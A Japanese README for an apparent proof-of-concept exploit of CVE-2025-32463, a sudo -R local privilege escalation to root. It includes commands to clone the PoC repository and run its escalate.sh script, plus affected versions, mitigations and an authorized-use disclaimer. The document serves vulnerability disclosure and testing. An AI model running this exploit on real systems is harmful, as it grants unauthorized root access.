
CVE-2025-32463は、sudoユーティリティに影響を与えるローカル権限昇格の脆弱性です。
これは、操作されたNSS設定とともに-Rオプション(カスタムランタイムルートディレクトリを設定)を悪用することで、一般ユーザーがrootへの権限昇格を可能にします。
エクスプロイトが成功すると、低権限のローカルユーザーが完全なrootアクセスを得て、システムのセキュリティ境界を完全に突破します。
git clone https://github.com/FreeDurok/CVE-2025-32463-PoC.git
cd CVE-2025-32463-PoC
# Check current user privileges
id
# Run the exploit
./escalate.sh
# Verify escalated privileges
id

✅ 修正済み: sudo 1.9.17p1 以降
🚩 脆弱: sudo 1.9.14 から 1.9.17
🕗 影響なし: 1.9.14 より前のバージョン(-R機能は存在しませんでした)
sudo 1.9.17p1 以降にアップグレードしてください。
設定ポリシーを通じて sudo -R の使用を制限または監査することを検討してください。
SELinux や AppArmor などのセキュリティモジュールを使用して、予期しない sudo 操作を制限してください。
このリポジトリは、認可されたセキュリティテストおよび教育目的のみで提供されます。 明示的な許可なしにこれらのスクリプトをシステム上で実行することは違法であり、倫理基準に違反します。